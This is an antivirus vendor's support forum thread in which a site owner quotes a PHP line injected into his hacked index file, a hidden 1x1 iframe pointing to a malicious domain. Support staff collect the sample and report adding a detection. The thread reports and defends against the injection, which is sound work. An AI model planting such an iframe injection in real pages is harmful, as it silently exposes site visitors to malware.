Index Injection Iframe Virus

Hello,

My site was hacked, by this line added at top of the index file.

<?php echo "<iframe src=\"http://sluxxqqgykewolmoli.in/in.cgi?default\" width=1 height=1 frameborder=0></iframe>"; echo "";

And Bitdefender don't detect this !

thank you to add this one

all my pass was changed

Find more posts tagged with

Comments

rootkit

Hello

Welcome to the forums!

Bitdefender detects that website as infected.

https://www.virustotal.com/url/88411726de37...sis/1336300527/

Let me know if you have other questions.

Take care.

mickaeldu93

Oh yes, it was te only one on the list that detect it.

I tought it not detect it because when I scan my index file, it said no virus, but with other url injection I got on another website, it said virus and delete the virus from the file automatically.

Why the index file not detected as virus so like other url injections ?

thank you

rootkit

Hello

Could you please send me the infected index file so we can check it out?

Please pack that file in archive with the password infected and upload it on

http://www.sendspace.com

http://www.mediafire.com

and send me a PM with the download link.

We will analyze the information you sent and then reply with a possible solution in the shortest time.

Have a nice day.

mickaeldu93

Could you please send me the infected index file so we can check it out?

PM sent with zip link

ty !

rootkit

Hello

I have sent the file to our labs, I will get back to you with a final answer.

Take care.

Fa1c0n

I am interested to hear about this too as i found this code on one of our websites too and have been googling for information.

Please pop an update on this thread when you have one.

rootkit

Hello

The file has been signed as Trojan.Iframe.APT Detection will be available after our next update.

File index_php declared INFECTED

Thank you for the sample.

mickaeldu93

Hi Christian,

Great job, now I feel better on my FTP updates :-)

Thank you !!

rootkit

Thank you for your feedback!

Let us know if you need anything from us.

Take care.